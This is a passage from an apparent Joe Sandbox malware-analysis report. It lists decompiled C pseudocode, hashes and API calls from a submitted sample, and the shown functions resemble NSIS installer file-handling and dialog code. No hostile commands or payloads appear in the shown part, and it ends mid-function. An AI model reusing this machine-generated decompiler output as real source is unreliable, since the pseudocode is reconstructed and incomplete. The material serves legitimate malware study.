                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                            • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                            • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                            • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E0040573D(CHAR* _a4) {
                                                                                            				signed char _t3;
                                                                                            
                                                                                            				_t3 = GetFileAttributesA(_a4); // executed
                                                                                            				if(_t3 != 0xffffffff) {
                                                                                            					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                            				}
                                                                                            				return _t3;
                                                                                            			}




                                                                                            0x00405741
                                                                                            0x0040574a
                                                                                            0x00000000
                                                                                            0x00405753
                                                                                            0x00405759

                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                            • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                                                                                            • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                            • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E004031A8(void* _a4, long _a8) {
                                                                                            				int _t6;
                                                                                            				long _t10;
                                                                                            
                                                                                            				_t10 = _a8;
                                                                                            				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                                                                                            				if(_t6 == 0 || _a8 != _t10) {
                                                                                            					return 0;
                                                                                            				} else {
                                                                                            					return 1;
                                                                                            				}
                                                                                            			}





                                                                                            0x004031ac
                                                                                            0x004031bf
                                                                                            0x004031c7
                                                                                            0x00000000
                                                                                            0x004031ce
                                                                                            0x00000000
                                                                                            0x004031d0

                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                            • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                                                                                            • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                            • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E004031DA(long _a4) {
                                                                                            				long _t2;
                                                                                            
                                                                                            				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                                                                                            				return _t2;
                                                                                            			}




                                                                                            0x004031e8
                                                                                            0x004031ee

                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                            • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                                                                            • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                            • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            C-Code - Quality: 95%
                                                                                            			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                            				struct HWND__* _v8;
                                                                                            				long _v12;
                                                                                            				struct tagRECT _v28;
                                                                                            				void* _v36;
                                                                                            				signed int _v40;
                                                                                            				int _v44;
                                                                                            				int _v48;
                                                                                            				signed int _v52;
                                                                                            				int _v56;
                                                                                            				void* _v60;
                                                                                            				void* _v68;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				long _t87;
                                                                                            				unsigned int _t92;
                                                                                            				int _t94;
                                                                                            				int _t95;
                                                                                            				void* _t101;
                                                                                            				intOrPtr _t112;
                                                                                            				intOrPtr _t123;
                                                                                            				struct HWND__* _t127;
                                                                                            				int _t149;
                                                                                            				int _t150;
                                                                                            				struct HWND__* _t154;
                                                                                            				struct HWND__* _t158;
                                                                                            				struct HMENU__* _t160;
                                                                                            				long _t162;
                                                                                            				void* _t163;
                                                                                            				short* _t164;
                                                                                            
                                                                                            				_t154 =  *0x423684;
                                                                                            				_t149 = 0;
                                                                                            				_v8 = _t154;
                                                                                            				if(_a8 != 0x110) {
                                                                                            					if(_a8 == 0x405) {
                                                                                            						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                            					}
                                                                                            					if(_a8 != 0x111) {
                                                                                            						L17:
                                                                                            						if(_a8 != 0x404) {
                                                                                            							L25:
                                                                                            							if(_a8 != 0x7b || _a12 != _t154) {
                                                                                            								goto L20;
                                                                                            							} else {
                                                                                            								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                                                            								_a8 = _t87;
                                                                                            								if(_t87 <= _t149) {
                                                                                            									L37:
                                                                                            									return 0;
                                                                                            								}
                                                                                            								_t160 = CreatePopupMenu();
                                                                                            								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                                                            								_t92 = _a16;
                                                                                            								if(_t92 != 0xffffffff) {
                                                                                            									_t150 = _t92;
                                                                                            									_t94 = _t92 >> 0x10;
                                                                                            								} else {
                                                                                            									GetWindowRect(_t154,  &_v28);
                                                                                            									_t150 = _v28.left;
                                                                                            									_t94 = _v28.top;
                                                                                            								}
                                                                                            								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                                                            								_t162 = 1;
                                                                                            								if(_t95 == 1) {
                                                                                            									_v60 = _t149;
                                                                                            									_v48 = 0x420498;
                                                                                            									_v44 = 0xfff;
                                                                                            									_a4 = _a8;
                                                                                            									do {
                                                                                            										_a4 = _a4 - 1;
                                                                                            										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                                                                                            									} while (_a4 != _t149);
                                                                                            									OpenClipboard(_t149);
                                                                                            									EmptyClipboard();
                                                                                            									_t101 = GlobalAlloc(0x42, _t162);
                                                                                            									_a4 = _t101;
                                                                                            									_t163 = GlobalLock(_t101);
                                                                                            									do {
                                                                                            										_v48 = _t163;
                                                                                            										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                                                            										 *_t164 = 0xa0d;
                                                                                            										_t163 = _t164 + 2;
                                                                                            										_t149 = _t149 + 1;
                                                                                            									} while (_t149 < _a8);
                                                                                            									GlobalUnlock(_a4);
                                                                                            									SetClipboardData(1, _a4);
                                                                                            									CloseClipboard();
                                                                                            								}
                                                                                            								goto L37;
                                                                                            							}
                                                                                            						}
                                                                                            						if( *0x42366c == _t149) {
                                                                                            							ShowWindow( *0x423ea8, 8);
                                                                                            							if( *0x423f2c == _t149) {
                                                                                            								_t112 =  *0x41fc68; // 0x0
                                                                                            								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                                                                                            							}
                                                                                            							E00403E10(1);
                                                                                            							goto L25;
                                                                                            						}
                                                                                            						 *0x41f860 = 2;
                                                                                            						E00403E10(0x78);
                                                                                            						goto L20;
                                                                                            					} else {
                                                                                            						if(_a12 != 0x403) {
                                                                                            							L20:
                                                                                            							return E00403E9E(_a8, _a12, _a16);
                                                                                            						}
                                                                                            						ShowWindow( *0x423670, _t149);
                                                                                            						ShowWindow(_t154, 8);
                                                                                            						E00403E6C(_t154);
                                                                                            						goto L17;
                                                                                            					}
                                                                                            				}
                                                                                            				_v52 = _v52 | 0xffffffff;
                                                                                            				_v40 = _v40 | 0xffffffff;
                                                                                            				_v60 = 2;
                                                                                            				_v56 = 0;
                                                                                            				_v48 = 0;
                                                                                            				_v44 = 0;
                                                                                            				asm("stosd");
                                                                                            				asm("stosd");
                                                                                            				_t123 =  *0x423eb0;
                                                                                            				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                                            				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                                            				 *0x423670 = GetDlgItem(_a4, 0x403);
                                                                                            				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                                                                                            				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                                            				 *0x423684 = _t127;
                                                                                            				_v8 = _t127;
                                                                                            				E00403E6C( *0x423670);
                                                                                            				 *0x423674 = E004046C5(4);
                                                                                            				 *0x42368c = 0;
                                                                                            				GetClientRect(_v8,  &_v28);
                                                                                            				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                                                            				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                                                            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                            				if(_a8 >= 0) {
                                                                                            					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                                            					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                                            				}
                                                                                            				if(_a12 >= _t149) {
                                                                                            					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                                                            				}
                                                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                            				_push(0x1b);
                                                                                            				E00403E37(_a4);
                                                                                            				if(( *0x423eb8 & 0x00000003) != 0) {
                                                                                            					ShowWindow( *0x423670, _t149);
                                                                                            					if(( *0x423eb8 & 0x00000002) != 0) {
                                                                                            						 *0x423670 = _t149;
                                                                                            					} else {
                                                                                            						ShowWindow(_v8, 8);
                                                                                            					}
                                                                                            					E00403E6C( *0x423668);
                                                                                            				}
                                                                                            				_t158 = GetDlgItem(_a4, 0x3ec);
                                                                                            				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                                                            				if(( *0x423eb8 & 0x00000004) != 0) {
                                                                                            					SendMessageA(_t158, 0x409, _t149, _a12);
                                                                                            					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                                                            				}
                                                                                            				goto L37;
                                                                                            			}

































                                                                                            0x00404f6a
                                                                                            0x00404f70
                                                                                            0x00404f79
                                                                                            0x00404f7c
                                                                                            0x00405114
                                                                                            0x00405138
                                                                                            0x00405138
                                                                                            0x0040514b
                                                                                            0x00405169
                                                                                            0x00405170
                                                                                            0x004051c7
                                                                                            0x004051cb
                                                                                            0x00000000
                                                                                            0x004051d2
                                                                                            0x004051da
                                                                                            0x004051e2
                                                                                            0x004051e5
                                                                                            0x004052de
                                                                                            0x00000000
                                                                                            0x004052de
                                                                                            0x004051f4
                                                                                            0x00405200
                                                                                            0x00405206
                                                                                            0x0040520c
                                                                                            0x00405221
                                                                                            0x00405227
                                                                                            0x0040520e
                                                                                            0x00405213
                                                                                            0x00405219
                                                                                            0x0040521c
                                                                                            0x0040521c
                                                                                            0x00405237
                                                                                            0x0040523f
                                                                                            0x00405242
                                                                                            0x0040524b
                                                                                            0x0040524e
                                                                                            0x00405255
                                                                                            0x0040525c
                                                                                            0x00405264
                                                                                            0x00405264
                                                                                            0x0040527b
                                                                                            0x0040527b
                                                                                            0x00405282
                                                                                            0x00405288
                                                                                            0x00405291
                                                                                            0x00405298
                                                                                            0x004052a1
                                                                                            0x004052a3
                                                                                            0x004052a6
                                                                                            0x004052b5
                                                                                            0x004052b7
                                                                                            0x004052bd
                                                                                            0x004052be
                                                                                            0x004052bf
                                                                                            0x004052c7
                                                                                            0x004052d2
                                                                                            0x004052d8
                                                                                            0x004052d8
                                                                                            0x00000000
                                                                                            0x00405242
                                                                                            0x004051cb
                                                                                            0x00405178
                                                                                            0x004051a8
                                                                                            0x004051b0
                                                                                            0x004051b2
                                                                                            0x004051bb
                                                                                            0x004051bb
                                                                                            0x004051c2
                                                                                            0x00000000
                                                                                            0x004051c2
                                                                                            0x0040517c
                                                                                            0x00405186
                                                                                            0x00000000
                                                                                            0x0040514d
                                                                                            0x00405153
                                                                                            0x0040518b
                                                                                            0x00000000
                                                                                            0x00405194
                                                                                            0x0040515c
                                                                                            0x00405161
                                                                                            0x00405164
                                                                                            0x00000000
                                                                                            0x00405164
                                                                                            0x0040514b
                                                                                            0x00404f82
                                                                                            0x00404f86
                                                                                            0x00404f8f
                                                                                            0x00404f96
                                                                                            0x00404f99
                                                                                            0x00404f9c
                                                                                            0x00404f9f
                                                                                            0x00404fa0
                                                                                            0x00404fa1
                                                                                            0x00404fba
                                                                                            0x00404fbd
                                                                                            0x00404fc7
                                                                                            0x00404fd6
                                                                                            0x00404fde
                                                                                            0x00404fe6
                                                                                            0x00404feb
                                                                                            0x00404fee
                                                                                            0x00404ffa
                                                                                            0x00405003
                                                                                            0x0040500c
                                                                                            0x0040502f
                                                                                            0x00405035
                                                                                            0x00405046
                                                                                            0x0040504b
                                                                                            0x00405059
                                                                                            0x00405067
                                                                                            0x00405067
                                                                                            0x0040506c
                                                                                            0x0040507a
                                                                                            0x0040507a
                                                                                            0x0040507f
                                                                                            0x00405082
                                                                                            0x00405087
                                                                                            0x00405093
                                                                                            0x0040509c
                                                                                            0x004050a9
                                                                                            0x004050b8
                                                                                            0x004050ab
                                                                                            0x004050b0
                                                                                            0x004050b0
                                                                                            0x004050c4
                                                                                            0x004050c4
                                                                                            0x004050d8
                                                                                            0x004050e1
                                                                                            0x004050ea
                                                                                            0x004050fa
                                                                                            0x00405106
                                                                                            0x00405106
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00404FC0
                                                                                            • GetDlgItem.USER32 ref: 00404FCF
                                                                                            • GetClientRect.USER32 ref: 0040500C
                                                                                            • GetSystemMetrics.USER32 ref: 00405014
                                                                                            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                                                                                            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                                                                                            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                                                                                            • ShowWindow.USER32(?,00000008), ref: 004050B0
                                                                                            • GetDlgItem.USER32 ref: 004050D1
                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                                                                                            • GetDlgItem.USER32 ref: 00404FDE
                                                                                              • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                                                                                            • GetDlgItem.USER32 ref: 00405123
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405138
                                                                                            • ShowWindow.USER32(00000000), ref: 0040515C
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405161
                                                                                            • ShowWindow.USER32(00000008), ref: 004051A8
                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051DA
                                                                                            • CreatePopupMenu.USER32 ref: 004051EB
                                                                                            • AppendMenuA.USER32 ref: 00405200
                                                                                            • GetWindowRect.USER32 ref: 00405213
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405282
                                                                                            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                                                                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                                                                                            • GlobalLock.KERNEL32 ref: 0040529B
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 004052D2
                                                                                            • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: {
                                                                                            • API String ID: 590372296-366298937
                                                                                            • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                                                                                            • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                                                                                            • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                                                                                            • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 97%
                                                                                            			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                                            				struct HWND__* _v8;
                                                                                            				struct HWND__* _v12;
                                                                                            				signed int _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				void* _v24;
                                                                                            				long _v28;
                                                                                            				int _v32;
                                                                                            				signed int _v40;
                                                                                            				int _v44;
                                                                                            				signed int* _v56;
                                                                                            				intOrPtr _v60;
                                                                                            				signed int _v64;
                                                                                            				long _v68;
                                                                                            				void* _v72;
                                                                                            				intOrPtr _v76;
                                                                                            				intOrPtr _v80;
                                                                                            				void* _v84;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				struct HWND__* _t182;
                                                                                            				int _t196;
                                                                                            				long _t202;
                                                                                            				signed int _t206;
                                                                                            				signed int _t217;
                                                                                            				void* _t220;
                                                                                            				void* _t221;
                                                                                            				int _t227;
                                                                                            				signed int _t232;
                                                                                            				signed int _t233;
                                                                                            				signed int _t240;
                                                                                            				struct HBITMAP__* _t250;
                                                                                            				void* _t252;
                                                                                            				char* _t268;
                                                                                            				signed char _t269;
                                                                                            				long _t274;
                                                                                            				int _t280;
                                                                                            				signed int* _t281;
                                                                                            				int _t282;
                                                                                            				long _t283;
                                                                                            				int _t285;
                                                                                            				long _t286;
                                                                                            				signed int _t287;
                                                                                            				long _t288;
                                                                                            				signed int _t291;
                                                                                            				signed int _t298;
                                                                                            				signed int _t300;
                                                                                            				signed int _t302;
                                                                                            				int* _t310;
                                                                                            				void* _t311;
                                                                                            				int _t315;
                                                                                            				int _t316;
                                                                                            				int _t317;
                                                                                            				signed int _t318;
                                                                                            				void* _t320;
                                                                                            
                                                                                            				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                            				_t182 = GetDlgItem(_a4, 0x408);
                                                                                            				_t280 =  *0x423ec8;
                                                                                            				_t320 = SendMessageA;
                                                                                            				_v8 = _t182;
                                                                                            				_t315 = 0;
                                                                                            				_v32 = _t280;
                                                                                            				_v20 =  *0x423eb0 + 0x94;
                                                                                            				if(_a8 != 0x110) {
                                                                                            					L23:
                                                                                            					if(_a8 != 0x405) {
                                                                                            						_t289 = _a16;
                                                                                            					} else {
                                                                                            						_a12 = _t315;
                                                                                            						_t289 = 1;
                                                                                            						_a8 = 0x40f;
                                                                                            						_a16 = 1;
                                                                                            					}
                                                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                            						_v16 = _t289;
                                                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                                            							if(( *0x423eb9 & 0x00000002) != 0) {
                                                                                            								L41:
                                                                                            								if(_v16 != _t315) {
                                                                                            									_t232 = _v16;
                                                                                            									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                                            										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                                            									}
                                                                                            									_t233 = _v16;
                                                                                            									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                                            										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                                            											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                                            										} else {
                                                                                            											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                                            										}
                                                                                            									}
                                                                                            								}
                                                                                            								goto L48;
                                                                                            							}
                                                                                            							if(_a8 == 0x413) {
                                                                                            								L33:
                                                                                            								_t289 = 0 | _a8 != 0x00000413;
                                                                                            								_t240 = E004046F2(_v8, _a8 != 0x413);
                                                                                            								if(_t240 >= _t315) {
                                                                                            									_t93 = _t280 + 8; // 0x8
                                                                                            									_t310 = _t240 * 0x418 + _t93;
                                                                                            									_t289 =  *_t310;
                                                                                            									if((_t289 & 0x00000010) == 0) {
                                                                                            										if((_t289 & 0x00000040) == 0) {
                                                                                            											_t298 = _t289 ^ 0x00000001;
                                                                                            										} else {
                                                                                            											_t300 = _t289 ^ 0x00000080;
                                                                                            											if(_t300 >= 0) {
                                                                                            												_t298 = _t300 & 0xfffffffe;
                                                                                            											} else {
                                                                                            												_t298 = _t300 | 0x00000001;
                                                                                            											}
                                                                                            										}
                                                                                            										 *_t310 = _t298;
                                                                                            										E0040117D(_t240);
                                                                                            										_t289 = 1;
                                                                                            										_a8 = 0x40f;
                                                                                            										_a12 = 1;
                                                                                            										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
                                                                                            									}
                                                                                            								}
                                                                                            								goto L41;
                                                                                            							}
                                                                                            							_t289 = _a16;
                                                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                            								goto L41;
                                                                                            							}
                                                                                            							goto L33;
                                                                                            						} else {
                                                                                            							goto L48;
                                                                                            						}
                                                                                            					} else {
                                                                                            						L48:
                                                                                            						if(_a8 != 0x111) {
                                                                                            							L56:
                                                                                            							if(_a8 == 0x200) {
                                                                                            								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                                            							}
                                                                                            							if(_a8 == 0x40b) {
                                                                                            								_t220 =  *0x420474;
                                                                                            								if(_t220 != _t315) {
                                                                                            									ImageList_Destroy(_t220);
                                                                                            								}
                                                                                            								_t221 =  *0x42048c;
                                                                                            								if(_t221 != _t315) {
                                                                                            									GlobalFree(_t221);
                                                                                            								}
                                                                                            								 *0x420474 = _t315;
                                                                                            								 *0x42048c = _t315;
                                                                                            								 *0x423f00 = _t315;
                                                                                            							}
                                                                                            							if(_a8 != 0x40f) {
                                                                                            								L86:
                                                                                            								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
                                                                                            									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                                            									ShowWindow(_v8, _t316);
                                                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                                            								}
                                                                                            								goto L89;
                                                                                            							} else {
                                                                                            								E004011EF(_t289, _t315, _t315);
                                                                                            								if(_a12 != _t315) {
                                                                                            									E0040140B(8);
                                                                                            								}
                                                                                            								if(_a16 == _t315) {
                                                                                            									L73:
                                                                                            									E004011EF(_t289, _t315, _t315);
                                                                                            									_v32 =  *0x42048c;
                                                                                            									_t196 =  *0x423ec8;
                                                                                            									_v60 = 0xf030;
                                                                                            									_v16 = _t315;
                                                                                            									if( *0x423ecc <= _t315) {
                                                                                            										L84:
                                                                                            										InvalidateRect(_v8, _t315, 1);
                                                                                            										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
                                                                                            											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                                                                                            										}
                                                                                            										goto L86;
                                                                                            									}
                                                                                            									_t281 = _t196 + 8;
                                                                                            									do {
                                                                                            										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                                            										if(_t202 != _t315) {
                                                                                            											_t291 =  *_t281;
                                                                                            											_v68 = _t202;
                                                                                            											_v72 = 8;
                                                                                            											if((_t291 & 0x00000001) != 0) {
                                                                                            												_v72 = 9;
                                                                                            												_v56 =  &(_t281[4]);
                                                                                            												_t281[0] = _t281[0] & 0x000000fe;
                                                                                            											}
                                                                                            											if((_t291 & 0x00000040) == 0) {
                                                                                            												_t206 = (_t291 & 0x00000001) + 1;
                                                                                            												if((_t291 & 0x00000010) != 0) {
